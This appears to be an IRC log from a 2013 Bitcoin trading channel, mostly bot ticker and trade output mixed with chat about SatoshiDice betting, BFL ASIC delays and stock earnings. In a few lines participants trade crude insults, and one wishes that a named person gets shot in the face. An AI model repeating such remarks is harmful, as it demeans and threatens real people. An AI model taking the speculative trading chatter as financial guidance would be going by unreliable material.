0.00061327 = 5.2435 BTC [-] Jan 23 19:28:14 i was going to make that point also Jan 23 19:28:15 sun-level stars can synthesize at most iron Jan 23 19:28:15 [MPEX] [S.MPOE] 8177 @ 0.00061405 = 5.0211 BTC [+] Jan 23 19:28:20 lol Jan 23 19:28:24 stuff like gold comes from supernovas Jan 23 19:28:32 gold is ancient as space and time itself almost Jan 23 19:28:39 in terms of human perseption Jan 23 19:28:57 perception Jan 23 19:29:04 my type is fail Jan 23 19:29:04 ok jspham Jan 23 19:29:06 helium is more rare than gold but tghat isnt truly my point Jan 23 19:29:17 that* Jan 23 19:29:17 helium is not more rare than gold. Jan 23 19:29:27 on earth Jan 23 19:29:33 ;) Jan 23 19:29:55 ^perception. you plan on mining the sun mp? Jan 23 19:30:01 even so ?! 1 mol of gold is what, 200kgs Jan 23 19:30:05 1 mol of helium is 22.4 liters. Jan 23 19:30:12 prolly 1000:1 he:au Jan 23 19:30:28 yeah but we waste helium and talk funny Jan 23 19:30:55 [MPEX] [S.MPOE] 8796 @ 0.00060598 = 5.3302 BTC [-] Jan 23 19:31:04 i'd waste gold if it made me talk funny Jan 23 19:31:16 my point was that finite things always run ouy Jan 23 19:31:18 out* Jan 23 19:31:23 id does if you waste it for helium Jan 23 19:31:28 it Jan 23 19:31:31 lol Jan 23 19:31:34 haha Jan 23 19:31:44 lol Jan 23 19:31:52 people will always be selling btc though Jan 23 19:32:01 pumps Jan 23 19:35:46 !ticker m S.DICE Jan 23 19:35:47 [MPEX:S.DICE] 1D: 0.0051312 / 0.00548008 / 0.00614098 (153015 shares, 838.54 BTC), 7D: 0.00454708 / 0.00530983 / 0.00614098 (481678 shares, 2,557.63 BTC), 30D: 0.00343244 / 0.00417854 / 0.00614098 (9629909 shares, 40,238.99 BTC) Jan 23 19:35:54 ;;ticker Jan 23 19:35:55 BTCUSD ticker | Best bid: 17.31862, Best ask: 17.33000, Bid-ask spread: 0.01138, Last trade: 17.33000, 24 hour volume: 53588.45314260, 24 hour low: 16.80155, 24 hour high: 17.58890, 24 hour vwap: 17.20807 Jan 23 19:36:28 !ticker h sdice Jan 23 19:36:29 [HAVELOCK:SDICE] 1D: 0.51000001 / 0.53671746 / 0.55500000 (177 shares, 94.99898964 BTC), 7D: 0.48000000 / 0.54341709 / 0.62000000 (637 shares, 346.15668934 BTC), 30D: 0.37000000 / 0.46687217 / 0.62000000 (4172 shares, 1947.79068932 BTC) Jan 23 19:37:11 !ticker m O.BTCUSD.C170T Jan 23 19:37:12 [MPEX:O.BTCUSD.C170T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jan 23 19:48:08 [HAVELOCK] [SDICE] 9 @ 0.53999999 = 4.86 BTC [+] Jan 23 19:48:51 [MPEX] [S.DICE] 108 @ 0.00602995 = 0.6512 BTC [-] Jan 23 19:48:52 [MPEX] [S.DICE] 2300 @ 0.00602994 = 13.8689 BTC [-] Jan 23 19:48:59 [MPEX] [S.DICE] 851 @ 0.00595519 = 5.0679 BTC [-] Jan 23 19:49:01 [MPEX] [S.DICE] 1741 @ 0.00592487 = 10.3152 BTC [-] Jan 23 19:51:07 [HAVELOCK] [SDICE] 1 @ 0.54 BTC [+] Jan 23 20:08:09 [BTCTC] [MININGCO.ETF] 2 @ 0.5 = 1 BTC Jan 23 20:11:32 [MPEX] [S.MPOE] 2200 @ 0.00061253 = 1.3476 BTC [+] Jan 23 20:11:34 [MPEX] [S.MPOE] 19450 @ 0.00061405 = 11.9433 BTC [+] Jan 23 20:13:40 [MPEX] [S.MPOE] 7004 @ 0.00060598 = 4.2443 BTC [-] Jan 23 20:13:42 [MPEX] [S.MPOE] 7392 @ 0.00060433 = 4.4672 BTC [-] Jan 23 20:22:40 [MPEX] [S.MPOE] 5058 @ 0.00060433 = 3.0567 BTC [-] Jan 23 20:22:42 [MPEX] [S.MPOE] 12349 @ 0.0006033 = 7.4502 BTC [-] Jan 23 20:22:43 [MPEX] [S.MPOE] 4743 @ 0.00060084 = 2.8498 BTC [-] Jan 23 20:34:28 *reads scrollback* oh, there will be supply... when most scams decide to close and sell Jan 23 20:35:45 or vice versa hehe Jan 23 20:40:42 [MPEX] [S.MPOE] 20000 @ 0.00060085 = 12.017 BTC [+] Jan 23 20:40:43 [MPEX] [S.MPOE] 457 @ 0.00060084 = 0.2746 BTC [-] Jan 23 20:40:45 [MPEX] [S.MPOE] 2593 @ 0.00059517 = 1.5433 BTC [-] Jan 23 20:41:07 ;;ticker m s.dice Jan 23 20:41:07 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Jan 23 20:41:18 !ticker m s.dice Jan 23 20:41:20 [MPEX:S.DICE] 1D: 0.0051312 / 0.00550902 / 0.00614098 (150853 shares, 831.05 BTC), 7D: 0.00454708 / 0.00533426 / 0.00614098 (471074 shares, 2,512.83 BTC), 30D: 0.00343244 / 0.00417947 / 0.00614098 (9634909 shares, 40,268.90 BTC) Jan 23 20:41:28 jurov not that many scams left. Jan 23 20:41:53 ;;ticker Jan 23 20:41:53 BTCUSD ticker | Best bid: 17.33904, Best ask: 17.41799, Bid-ask spread: 0.07895, Last trade: 17.33904, 24 hour volume: 52619.42457762, 24 hour low: 16.80155, 24 hour high: 17.58890, 24 hour vwap: 17.19969 Jan 23 20:42:58 Epic betting session Jan 23 20:43:02 still going Jan 23 20:43:12 now >150k in <24hrs Jan 23 20:43:54 woah Jan 23 20:44:09 maybe that has something to do with Gox Jan 23 20:44:20 buying up BTC to bet on SD Jan 23 20:44:22 ;) Jan 23 20:45:16 does anyone know how much all the asic companies raised? it's pirate-level or less? Jan 23 20:45:48 3.48M$ Jan 23 20:45:51 ish Jan 23 20:45:58 see i understand bit-pay as a payment processor that acts in fiat Jan 23 20:46:00 and keeps the btc Jan 23 20:46:24 after the BFL asic announcement, they were seeking buyers off the exchange Jan 23 20:46:44 if they have the financial fiat backing to process directly in fiat Jan 23 20:46:48 [MPEX] [S.MPOE] 15279 @ 0.00061064 = 9.33 BTC [+] Jan 23 20:46:49 and then simply hold the btc Jan 23 20:47:06 or sell it, or have fun with walls Jan 23 20:47:25 that makes bit-pay a goliath Jan 23 20:48:09 jurov it's probably about there. Jan 23 20:48:19 depends if you count btc or usd and how narrow you cap things Jan 23 20:48:51 jcpham if they try to play the market uninsured they are doomed. Jan 23 20:49:15 its a risky proposition for sure Jan 23 20:49:31 moreover, any random geek things two things of himself Jan 23 20:49:42 that he can code a clone to X and that he can "play the market". Jan 23 20:49:46 neither are in fact true. Jan 23 20:50:10 i just wonder who's in control of those coins and how they make it back to market Jan 23 20:50:15 and on what timescale Jan 23 20:51:06 i like to imagine they just process and that way they'll live forever. Jan 23 20:51:33 tho you have a point, a bfl-bitpay tandem collapse is certainly conceivable. Jan 23 20:51:57 they have taken in a lot of coins Jan 23 20:52:09 i can't imagine any entity with more to dispose of Jan 23 20:52:27 ;;bc,24hprc Jan 23 20:52:28 17.17 Jan 23 20:52:44 i think i know a couple. Jan 23 20:52:56 well of course you might Jan 23 20:53:03 haha Bugpowder_ wins the price oddity jackpot Jan 23 20:54:12 hm so that post pays off, i have like 3 ppl wantign the job already Jan 23 20:54:47 how much do i win? Jan 23 20:55:27 ~0.00 Jan 23 20:55:43 ;;calc 0.00 * 17.17 Jan 23 20:55:44 0 Jan 23 20:55:47 :-( Jan 23 20:55:50 small jackpot Jan 23 20:56:29 GOOG Jan 23 20:56:39 747.55 Jan 23 20:56:41 ! Jan 23 21:08:29 dead cat jump :D\ Jan 23 21:33:55 jurov, around? Jan 23 21:34:05 yes Jan 23 21:34:16 owe you an apology Jan 23 21:34:26 O.O Jan 23 21:34:47 didn't mean to come across like such a dick on your coinbr thread Jan 23 21:35:13 it actually began elsewhere.. but okay, you're welcome Jan 23 21:35:25 i'd just been attacked by mpoe-pr over security issues, and it came up that mpex if you lose your key you're f'd. Jan 23 21:36:20 not so much lose actually, if someone else gets your key, you're f'd. Jan 23 21:37:08 I realized that for you to trade live, you have to keep that key on the server. Jan 23 21:37:46 and then I realized that there was a brokerage doing just that. Jan 23 21:38:42 anyway, long story short, combination frustration with mpoe-pr and worried about another big btc compromise, I asked questions publicly that I should have asked privately. Jan 23 21:39:06 actually it was fine... until that name calling :D Jan 23 21:39:14 I'm convinced now that you've taken every precaution you can, and will eventually likely be using coinbr. Jan 23 21:39:25 yup, thus, the apology. Jan 23 21:39:38 accepted ;) Jan 23 21:40:35 thanks for the valuable insight bob Jan 23 21:40:41 lol Jan 23 21:41:02 bob has bitch tits Jan 23 21:41:05 eskimo,seems you do it for free instead, and poorly... i rather like her professional job Jan 23 21:41:22 you should hire someone Jan 23 21:43:08 back to my day job. later all. Jan 23 21:44:37 what is old-school PR Jan 23 21:47:24 I think there is an awful lot that you do not understand Jan 23 21:48:01 your scope seems to be limited to smoking crack and making mud pies Jan 23 21:48:21 or art or whatever you call that Jan 23 21:50:05 this is best old-school PR stunt ever: http://kccbigcountry.hubpages.com/hub/Crush--Texas-The-Train-Crash-of-1896 Jan 23 21:52:59 Some of the debris came down among the spectators, killing three and injuring several more. Crush was immediately fired from the Katy railroad. In light of a lack of negative publicity, however, he was rehired the next day. Jan 23 21:53:07 ^ wikipedia says Jan 23 22:03:28 ;;bc,24hprc Jan 23 22:03:29 17.16 Jan 23 22:04:49 Now the biggest risks have gone so please expect the enjoying of both short-term and long-term profits of us in the next years. And also thanks for your patience. Jan 23 22:06:10 ;;bc,stats Jan 23 22:06:12 Current Blocks: 217732 | Current Difficulty: 2968775.3320751 | Next Difficulty At Block: 219743 | Next Difficulty In: 2011 blocks | Next Difficulty In About: 3 weeks, 3 days, 3 hours, 50 minutes, and 18 seconds | Next Difficulty Estimate: 2145071.19164676 | Estimated Percent Change: -27.745586927 Jan 23 22:06:45 there are people who abhor profits, and need to be told otherwise, you know Jan 23 22:08:29 my answer to that is http://www.youtube.com/watch?v=zzlAvPZT2nA Jan 23 22:10:39 lol indeed Jan 23 22:11:28 I shill for mpex derp Jan 23 22:12:39 !ticker h sdice Jan 23 22:12:48 oooooo no assbot Jan 23 22:12:57 ah right right Jan 23 22:13:14 ill move it to another box i think Jan 23 22:13:44 what happeend to it ? Jan 23 22:13:57 i rebooted that vbox Jan 23 22:14:01 o Jan 23 22:14:10 no worries Jan 23 22:14:20 [MPEX] [S.MPOE] 100 @ 0.0006106 = 0.0611 BTC [-] Jan 23 22:14:21 [HAVELOCK] [SDICE] 5 @ 0.575 = 2.875 BTC [+] Jan 23 22:14:22 [HAVELOCK] [SDICE] 5 @ 0.589 = 2.945 BTC [+] Jan 23 22:14:23 [BTCTC] [RSM] 42 @ 0.0089 = 0.3738 BTC [-] Jan 23 22:15:06 [BTCTC] [RSM] 62 @ 0.009 = 0.558 BTC [+] Jan 23 22:15:08 [BTCTC] [RSM] 8 @ 0.009 = 0.072 BTC [+] Jan 23 22:16:16 https://bitcointalk.org/index.php?topic=136499.msg1473976#msg1473976 Jan 23 22:18:00 the old someone got into my account excuse eh Jan 23 22:19:10 dub, haha Jan 23 22:21:45 heh. Jan 23 22:21:58 what was all that bullshit with "old money" and "will deliver" and "your friend" etc Jan 23 22:25:13 hey EskimoBob_afk Jan 23 22:25:26 pretty sure they are on track to deliver Jan 23 22:25:42 finally Jan 23 22:27:47 have they performed the order selection clusterfuckover process yet? Jan 23 22:28:52 no clue Jan 23 22:29:02 [MPEX] [S.MPOE] 15000 @ 0.00060815 = 9.1223 BTC [-] Jan 23 22:29:35 dub what do you figure they get sued for first, order selection or equity ? Jan 23 22:29:45 (in case they actually deliver, i mean) Jan 23 22:29:52 good, I'll assume the lack of contact with return instructions doesn't (yet) mean my sub 100 order is worthless Jan 23 22:30:47 mircea_popescu: no clue Jan 23 22:32:31 [MPEX] [S.MPOE] 10600 @ 0.00061064 = 6.4728 BTC [+] Jan 23 22:33:24 [MPEX] [S.DICE] 700 @ 0.00595587 = 4.1691 BTC [+] Jan 23 22:33:38 is it gonna be before march or no? Jan 23 22:36:08 i sure as hell hope so Jan 23 22:36:26 but knowing BFL, they'll probably have another delay Jan 23 22:38:38 [MPEX] [S.MPOE] 7600 @ 0.00061064 = 4.6409 BTC [+] Jan 23 22:40:34 my only hope is that someone shoots inaba in the face Jan 23 22:41:24 harsh Jan 23 22:46:52 [MPEX] [S.MPOE] 896 @ 0.00060815 = 0.5449 BTC [-] Jan 23 22:46:54 [MPEX] [S.MPOE] 11337 @ 0.00060757 = 6.888 BTC [-] Jan 23 22:47:49 lol kakobrekla you got btc in the bet ? Jan 23 22:48:01 sure Jan 23 22:48:05 haha Jan 23 22:48:22 gigavps you hedging on http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ ? Jan 23 22:48:57 since its my proposition, its the only right thing to do - bet Jan 23 22:49:42 mircea_popescu, i'm balls deep Jan 23 22:50:09 not sure how you hedge balls deep Jan 23 22:50:18 i imagined you may be the 500 on the no Jan 23 22:50:28 haha Jan 23 22:50:32 or w/e, 300 Jan 23 22:50:33 nope Jan 23 22:52:21 im curious how much of the yes are ppl who refunded / how much of no are ppl who stuck with their order Jan 23 22:52:36 so hedging, as opposed to people just speculating with no skin in the game Jan 23 22:55:08 [HAVELOCK] [SDICE] 11 @ 0.551 = 6.061 BTC [-] Jan 23 22:57:43 using bitbet as insurance... Jan 23 22:58:06 hah, self organizing insurance. Jan 23 22:58:26 should work. Jan 23 22:59:25 funny those morons on the forum still struggling to make the 20btc bfl bet after what a week Jan 23 23:01:25 https://bitcointalk.org/index.php?topic=135914.msg1474123#msg1474123 Jan 23 23:01:26 noted. Jan 23 23:01:40 ya well. Jan 23 23:03:42 [MPEX] [S.DICE] 2130 @ 0.00595587 = 12.686 BTC [+] Jan 23 23:23:09 [MPEX] [S.MPOE] 247 @ 0.00060715 = 0.15 BTC [-] Jan 23 23:23:11 [MPEX] [S.MPOE] 6003 @ 0.00060835 = 3.6519 BTC [+] Jan 23 23:23:25 [BTCTC] [BASIC-MINING] 5 @ 0.34 = 1.7 BTC [+] Jan 23 23:29:18 um. Jan 23 23:29:27 avalon claims they're in the red on first batch ? Jan 23 23:29:31 holy. Jan 23 23:29:43 leaky budget Jan 23 23:29:45 its okay Jan 23 23:30:15 it;s not. no asics in the history of bitcoin mining will be worth as much as that 1st batch Jan 23 23:30:23 if they can't turn a profit then, they can never turn a profit. Jan 23 23:32:19 [MPEX] [S.MPOE] 9450 @ 0.00060835 = 5.7489 BTC [+] Jan 23 23:36:07 i was being sarcastic like you Jan 23 23:38:20 [MPEX] [S.DICE] 170 @ 0.00595587 = 1.0125 BTC [+] Jan 23 23:39:28 [MPEX] [S.DICE] 1400 @ 0.00600715 = 8.41 BTC [+] Jan 23 23:39:52 [MPEX] [S.MPOE] 8883 @ 0.00060835 = 5.404 BTC [+] Jan 23 23:39:54 [MPEX] [S.MPOE] 9320 @ 0.00061064 = 5.6912 BTC [+] Jan 23 23:40:40 [MPEX] [S.DICE] 94 @ 0.00611858 = 0.5751 BTC [+] Jan 23 23:45:13 [BTCTC] [RSM] 3 @ 0.009 = 0.027 BTC [+] Jan 23 23:46:22 mircea_popescu: did you ever post what that image was? Jan 23 23:46:57 markedathome which one ? Jan 23 23:47:39 the one that you were going to pay 0,1334 btc for (and which the vertical was time) Jan 23 23:47:43 and speaking of which, let me point out that you can't be a dirty old man without having seen http://trilema.com/2013/frauengefangnis/ Jan 23 23:47:51 i mean 0.1337 Jan 23 23:47:56 markedathome a, no. nobody guessed, so i guess i might let the secret out Jan 23 23:48:07 trackbacks on my blog. Jan 23 23:48:40 so what was the big space gap in the middle? Jan 23 23:49:00 i leaked the wikileaks db a while back Jan 23 23:49:13 Now over 200,000 bet in the last 26 hours on S.DICE Jan 23 23:49:14 (then the next day they published it too) Jan 23 23:49:44 Bugpowder o.o is that like 1/3 of december ?! Jan 23 23:49:51 no Jan 23 23:49:56 its like 2/5ths Jan 23 23:50:02 ffs. Jan 23 23:50:06 i wonder what the upper bound of this is. Jan 23 23:50:16 when the whale breaks Jan 23 23:50:23 or comes down Jan 23 23:50:32 off the yayo Jan 23 23:51:11 but i mean... 1mn a month ? 5 ? 20 ?! Jan 23 23:51:13 over 20 ? Jan 23 23:51:25 well Jan 23 23:51:33 there was organic growth of miniwhales Jan 23 23:51:35 this month Jan 23 23:51:53 in between the massive binge at the start of the month and now Jan 23 23:52:01 so that is good. Jan 23 23:52:11 yeah Jan 23 23:52:22 the question is what happens when this whale blows his whole wad Jan 23 23:52:33 ;;ticker Jan 23 23:52:34 BTCUSD ticker | Best bid: 17.49501, Best ask: 17.49510, Bid-ask spread: 0.00009, Last trade: 17.49501, 24 hour volume: 49777.38979188, 24 hour low: 16.80155, 24 hour high: 17.49501, 24 hour vwap: 17.19659 Jan 23 23:52:36 which I estimate currently to be 30,000 BTC in the addresses that have flashed Jan 23 23:52:38 we see 19 ? Jan 23 23:52:49 hopefully by tomorrow :) Jan 23 23:52:56 no i mean... when he blows his wad... Jan 23 23:52:57 we see 19 Jan 23 23:53:04 19 whats? Jan 23 23:53:07 dollahs Jan 23 23:53:13 heh Jan 23 23:53:16 yeah Jan 23 23:53:27 ;;asks 19 Jan 23 23:53:27 i wonder how much of the buy pressure is ppl wanting btc to sd Jan 23 23:53:29 There are currently 20627.928 bitcoins offered at or under 19.0 USD, worth 371592.589557 USD in total. Jan 23 23:53:30 Considering 1.9% loss average... you don't need too much to make a huge amount of bets Jan 23 23:53:32 ;;asks 19.5 Jan 23 23:53:34 There are currently 23352.431 bitcoins offered at or under 19.5 USD, worth 424184.625256 USD in total. Jan 23 23:53:41 Namworld yes but if you make large ones Jan 23 23:53:42 ;;asks 20 Jan 23 23:53:44 There are currently 33143.873 bitcoins offered at or under 20.0 USD, worth 618445.377545 USD in total. Jan 23 23:53:45 variance can take a bite. Jan 23 23:54:05 yeah, variance will take a bite Jan 23 23:54:15 you can't come back once you blow the wad Jan 23 23:54:21 unless you buy more Jan 23 23:54:22 oh man Jan 23 23:54:32 if the addresses go to zero Jan 23 23:54:32 when i was younger i had this real flashy uncle Jan 23 23:54:45 and then a new set start betting with the same pattern Jan 23 23:54:48 :) Jan 23 23:54:48 he was always on the hustle Jan 23 23:54:57 real estate, wahetver Jan 23 23:55:06 this christmas i whispered bitcoin in his ear Jan 23 23:55:12 and told him to trust me Jan 23 23:55:16 jcpham good move. Jan 23 23:55:32 i think it's my uncle Jan 23 23:55:37 he needs a new toupe Jan 23 23:55:58 is his name by any chance bob ? Jan 23 23:56:05 it might be Jan 23 23:56:08 [HAVELOCK] [KCIM] 1 @ 0.91 BTC [-] Jan 23 23:56:19 i'm not real close with family Jan 23 23:57:22 This address busted out. Jan 23 23:57:23 http://blockchain.info/charts/balance?address=1Di6ux3CQBNXCZLD76BsnYWDo6XnFGzQah Jan 23 23:57:23 [MPEX] [S.MPOE] 22850 @ 0.00060567 = 13.8396 BTC [-] Jan 23 23:57:24 [MPEX] [S.MPOE] 2500 @ 0.00060557 = 1.5139 BTC [-] Jan 23 23:57:28 For one whale for which variance takes a bit, another should win extra from variance, on average. So should even out. Jan 23 23:57:55 All will always tend to 1.9% loss per bet. Jan 23 23:58:14 That address that busted out, is actually at the top of the leaderboard Jan 23 23:58:31 Bugpowder classic casino story. Jan 23 23:58:55 [MPEX] [S.DICE] 2100 @ 0.0060583 = 12.7224 BTC [-] Jan 23 23:59:03 With 100k BTC, I could make 5 million in bets... Jan 23 23:59:40 Assuming I don't have good/bad streaks Jan 24 00:00:41 Bugpowder http://blockchain.info/charts/balance?address=1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Jan 24 00:04:43 Oh yeah... I remember that guy Jan 24 00:04:47 wowo Jan 24 00:04:54 didn't realize he was up so much Jan 24 00:05:01 [MPEX] [S.MPOE] 20667 @ 0.00061064 = 12.6201 BTC [+] Jan 24 00:05:03 I wonder if this is all one person, or 2-3 people Jan 24 00:05:38 what the heck... satoshidice? Jan 24 00:05:47 lol Jan 24 00:06:07 it's the mpex public addy you sillies. Jan 24 00:06:20 Namworld check THIS out Jan 24 00:06:21 http://blockchain.info/tx/caaaeca897edf294267517475a545192687687f9778a80f885a5ed81f5056581 Jan 24 00:06:26 he sent you 40BTC Jan 24 00:06:36 yeah Jan 24 00:06:52 do you know who it is? Jan 24 00:07:09 lol Jan 24 00:07:20 lol Jan 24 00:07:23 oh god Jan 24 00:07:23 lots of withdrawal lately. Jan 24 00:07:25 hehehe Jan 24 00:07:26 haha Jan 24 00:07:37 I guess people want to sell for USD before it pops back down Jan 24 00:07:37 No wonder I recognized that Jan 24 00:08:01 and then buy more BTC back Jan 24 00:08:16 Namworld yeah, i bet you buncha ppl are o wow, its 17, let's sell Jan 24 00:08:16 dude I would be pouring money into MPEX to buy puts if I though the price was going to drop Jan 24 00:08:24 then when it's 25 they go o wow, let's buy back! Jan 24 00:08:26 way cheaper Jan 24 00:08:27 then it goes to 19 again Jan 24 00:08:53 ;;ticker Jan 24 00:08:54 BTCUSD ticker | Best bid: 17.49850, Best ask: 17.49990, Bid-ask spread: 0.00140, Last trade: 17.49850, 24 hour volume: 49824.23889575, 24 hour low: 16.80155, 24 hour high: 17.49990, 24 hour vwap: 17.19784 Jan 24 00:08:59 yeahhh Jan 24 00:09:01 comeon Jan 24 00:09:04 Bugpowder yup puts much more efficient way to benefit from dip, but... i doubt any dips soon Jan 24 00:09:34 can the bulls break thru in time to make my 160s profitable Jan 24 00:10:39 o hey, closes tomorrow huh Jan 24 00:11:59 rotten AAPL Jan 24 00:12:05 closes on FRIDAY Jan 24 00:12:09 not THURSDAY Jan 24 00:12:16 right? Jan 24 00:12:44 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.01059014 = 10.5901 BTC [-] Jan 24 00:12:45 ;;bc;24hrpc Jan 24 00:12:46 Error: "bc;24hrpc" is not a valid command. Jan 24 00:12:48 ugh Jan 24 00:12:49 well it's thursday here Jan 24 00:13:06 wow Jan 24 00:13:11 its like so far away Jan 24 00:13:33 NFLX Jan 24 00:13:38 whoa Jan 24 00:13:48 up 40% Jan 24 00:14:43 how come ? Jan 24 00:15:09 its not, just 100odd Jan 24 00:15:15 was what, 90s last month Jan 24 00:15:32 whoa fuck after hours. wtf ? Jan 24 00:16:03 nflx posts surprise profit Jan 24 00:16:31 +13c vs. -13c expectation Jan 24 00:16:46 2.1m subscriber growth to 27m Jan 24 00:16:51 not bad Jan 24 00:16:55 for a quarter Jan 24 00:17:09 dude, i wish to see the day when btc shares jump 34% over a .4% improvement of profit Jan 24 00:18:14 [MPEX] [S.MPOE] 1600 @ 0.00061064 = 0.977 BTC [+] Jan 24 00:19:15 AAPL plummets Jan 24 00:19:33 its been in near free fall since october Jan 24 00:20:19 It was obvious short as soon as maps fucked up Jan 24 00:20:39 that error makes people switch out of autobuy mode Jan 24 00:20:45 and consider samsung or other phones Jan 24 00:21:00 but now google maps is back Jan 24 00:21:03 Doog has a special edition of the SD charts up Jan 24 00:21:04 https://bitcointalk.org/index.php?topic=80312.msg1474248#msg1474248 Jan 24 00:21:04 what is the general borrowing rate these days for AAPL stock? Jan 24 00:21:48 Final SD Profit: 41793.46029369 BTC (1.836%) Jan 24 00:21:52 pretty heavy. Jan 24 00:23:20 thats cume Jan 24 00:23:28 485,000 BTC bet this month Jan 24 00:23:53 yowza Jan 24 00:24:10 hopefully we will see some upwards movement in the stock price now Jan 24 00:24:26 that the pretty graphics are helping the slow bus riders Jan 24 00:24:33 short bus Jan 24 00:25:11 +8600 for the month Jan 24 00:25:35 ;;calc 8600/.019 Jan 24 00:25:35 452631.578947 Jan 24 00:25:43 slightly above EV Jan 24 00:34:37 [MPEX] [S.MPOE] 11878 @ 0.00061064 = 7.2532 BTC [+] Jan 24 00:34:39 [MPEX] [S.MPOE] 8424 @ 0.00061405 = 5.1728 BTC [+] Jan 24 00:34:40 [MPEX] [S.MPOE] 8008 @ 0.00061411 = 4.9178 BTC [+] Jan 24 00:34:59 [MPEX] [O.BTCUSD.C110T] 425 @ 0.36042575 = 153.1809 BTC [-] Jan 24 00:42:09 [HAVELOCK] [SDICE] 1 @ 0.54 BTC [-] Jan 24 00:42:28 [MPEX] [S.DICE] 500 @ 0.00609999 = 3.05 BTC [+] **** BEGIN LOGGING AT Thu Jan 24 06:35:56 2013 Jan 24 06:36:21 Sounds like it's time o beat June 2011 record... it's just a few thousand BTCs away. Jan 24 06:36:24 Heyyo Jan 24 06:36:32 ;;ticker Jan 24 06:36:33 BTCUSD ticker | Best bid: 18.15101, Best ask: 18.22999, Bid-ask spread: 0.07898, Last trade: 18.22999, 24 hour volume: 60278.80134135, 24 hour low: 16.80155, 24 hour high: 18.29413, 24 hour vwap: 17.43627 Jan 24 06:36:59 Also S.DICE can't stop Jan 24 06:37:06 up 12500 Jan 24 06:37:20 insanity Jan 24 06:37:52 It seems so Jan 24 06:38:17 12.28 wall is half down now Jan 24 06:38:34 let's send clark moody another btctip Jan 24 06:39:38 lol... the wall gets eaten like nothing Jan 24 06:39:48 ;;asks 40 Jan 24 06:39:49 There are currently 47109.215 bitcoins offered at or under 40.0 USD, worth 1164362.98611 USD in total. Jan 24 06:40:06 Looking good, looking good Jan 24 06:40:25 [MPEX] [S.MPOE] 19876 @ 0.0006117 = 12.1581 BTC [+] Jan 24 06:40:57 mircea, crash that market Jan 24 06:41:22 or MPOE might have a poor month Jan 24 06:42:01 lol Jan 24 06:42:01 ;;asks 40 Jan 24 06:42:03 There are currently 47109.215 bitcoins offered at or under 40.0 USD, worth 1164362.98611 USD in total. Jan 24 06:42:03 ;;ticker Jan 24 06:42:04 BTCUSD ticker | Best bid: 18.15507, Best ask: 18.29412, Bid-ask spread: 0.13905, Last trade: 18.28501, 24 hour volume: 61945.37777144, 24 hour low: 16.80155, 24 hour high: 18.29413, 24 hour vwap: 17.46963 Jan 24 06:42:09 whoa 18 Jan 24 06:42:15 and away Jan 24 06:42:18 ;;bids 18 Jan 24 06:42:20 There are currently 3398.7406 bitcoins demanded at or over 18.0 USD, worth 61271.7364514 USD in total. Jan 24 06:42:20 http://www.bitcoincharts.com/markets/mtgoxUSD.html Jan 24 06:42:23 we're off to the races Jan 24 06:42:24 ;;asks 19 Jan 24 06:42:26 There are currently 5220.8083 bitcoins offered at or under 19.0 USD, worth 97652.0922263 USD in total. Jan 24 06:42:32 bejeysus Jan 24 06:42:34 4k BTC just got eaten at 18.28 Jan 24 06:42:41 sustained 20 dollar weekend Jan 24 06:42:43 2.5k got eaten Jan 24 06:42:43 plus Jan 24 06:42:47 2k disappeared Jan 24 06:42:51 ah Jan 24 06:42:56 Either way... Jan 24 06:42:58 yup, 20 looks like it. Jan 24 06:43:31 Seems like alot of activity on SD aaannnd lots of BTC being bought. Jan 24 06:43:41 At this rate SD will own 90% of all bitcoins Jan 24 06:43:46 lol Jan 24 06:43:47 nah Jan 24 06:43:50 lol Jan 24 06:43:58 whales are not down THAT much Jan 24 06:43:58 no see, the beaurty of it ? they distribute it back out Jan 24 06:44:07 It's an hyperbole but yeah Jan 24 06:44:07 which is the other half of the mpex advantage. Jan 24 06:44:17 on one hand, bettor knows sd can raise *any* sum to pay out. Jan 24 06:44:34 on the other hand, btc it makes as profit is not retained but pumped back out, so it never chokes the market Jan 24 06:44:36 SO thin Jan 24 06:44:45 ;;ask 18.9 Jan 24 06:44:45 Error: "ask" is not a valid command. Jan 24 06:44:48 ;;asks 18.9 Jan 24 06:44:48 ;;asks 40 Jan 24 06:44:50 There are currently 3361.8272 bitcoins offered at or under 18.9 USD, worth 62355.6748158 USD in total. Jan 24 06:44:52 There are currently 45338.516 bitcoins offered at or under 40.0 USD, worth 1131983.60822 USD in total. Jan 24 06:44:53 wired uk re-ran the forbes article Jan 24 06:44:58 basically Jan 24 06:45:00 jcpham coolness. Jan 24 06:45:06 today that is Jan 24 06:45:11 I'm watching the 40 USD/BTC mark Jan 24 06:45:12 asks is out of sync with clarkmoody Jan 24 06:45:21 well, time to add more options i guess. Jan 24 06:45:22 and mtgoxlive Jan 24 06:45:28 yup Jan 24 06:45:37 I want some C300Ns Jan 24 06:45:42 beat the 33 USD/BTC record Jan 24 06:45:54 Bugpowder i was thinking move to 5-35 Jan 24 06:45:59 oh yeah... you'll need to open more option choices, mircea Jan 24 06:46:01 yeah Jan 24 06:46:02 cause what's the point of like, c04 ? Jan 24 06:46:09 http://www.wired.co.uk/news/archive/2013-01/23/bitcoin Jan 24 06:46:52 well i guess they got their info from ars Jan 24 06:47:00 [MPEX] [S.MPOE] 6500 @ 0.00059943 = 3.8963 BTC [-] Jan 24 06:47:02 bu it reads like the forbes article if you ask me Jan 24 06:47:19 they all regurgitate the same info Jan 24 06:49:13 the article presses the physical casinos Jan 24 06:49:18 in any case Jan 24 06:50:23 [MPEX] [S.MPOE] 1045 @ 0.00059943 = 0.6264 BTC [-] Jan 24 06:50:25 [MPEX] [S.MPOE] 5633 @ 0.00059897 = 3.374 BTC [-] Jan 24 06:51:29 [MPEX] [S.DICE] 1000 @ 0.00558478 = 5.5848 BTC [-] Jan 24 06:52:42 ;;asks 40 Jan 24 06:52:44 There are currently 44530.428 bitcoins offered at or under 40.0 USD, worth 1117547.30645 USD in total. Jan 24 06:52:58 keeps going down a thousand or 2 every few minutes Jan 24 06:53:06 I'd like to see the record broken Jan 24 06:53:18 Would probably tumble down afterward Jan 24 06:53:46 QQQ is down 1.5% AH just due to the drop in APPL share value AH Jan 24 06:53:53 ONLY that Jan 24 06:54:04 AAPL is 15%. Jan 24 